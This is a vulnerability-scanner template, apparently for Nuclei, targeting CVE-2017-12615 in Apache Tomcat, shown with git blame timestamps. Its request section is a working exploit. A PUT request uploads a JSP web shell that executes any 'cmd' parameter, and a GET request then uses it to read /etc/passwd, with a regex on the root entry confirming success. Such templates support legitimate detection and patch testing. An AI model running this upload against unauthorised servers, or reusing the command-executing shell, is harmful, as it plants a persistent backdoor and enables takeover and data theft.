2021-02-10 09:44:26 +00:00
|
|
|
id: CVE-2017-12615
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Apache Tomcat RCE
|
|
|
|
author: pikpikcu
|
2021-09-10 11:26:40 +00:00
|
|
|
severity: high
|
2021-12-29 13:40:59 +00:00
|
|
|
tags: cve,cve2017,apache,rce,tomcat
|
2021-02-10 09:44:26 +00:00
|
|
|
reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
|
|
|
|
description: |
|
2021-08-19 14:44:46 +00:00
|
|
|
By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers.
|
|
|
|
This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server.
|
|
|
|
However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79}
|
|
|
|
Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 8.10
|
|
|
|
cve-id: CVE-2017-12615
|
|
|
|
cwe-id: CWE-434
|
2021-02-10 09:44:26 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: PUT
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/poc.jsp/"
|
|
|
|
headers:
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
body: |
|
2021-08-19 14:44:46 +00:00
|
|
|
<%@ page import="java.util.*,java.io.*"%>
|
|
|
|
<%
|
|
|
|
if (request.getParameter("cmd") != null) {
|
|
|
|
out.println("Command: " + request.getParameter("cmd") + "<BR>");
|
|
|
|
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
|
|
|
|
OutputStream os = p.getOutputStream();
|
|
|
|
InputStream in = p.getInputStream();
|
|
|
|
DataInputStream dis = new DataInputStream(in);
|
|
|
|
String disr = dis.readLine();
|
|
|
|
while ( disr != null ) {
|
|
|
|
out.println(disr);
|
|
|
|
disr = dis.readLine();
|
|
|
|
}
|
|
|
|
}
|
|
|
|
%>
|
2021-02-10 09:44:26 +00:00
|
|
|
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-03-22 08:01:31 +00:00
|
|
|
- "root:.*:0:0:"
|
2021-12-29 13:40:59 +00:00
|
|
|
|
2021-02-10 09:44:26 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|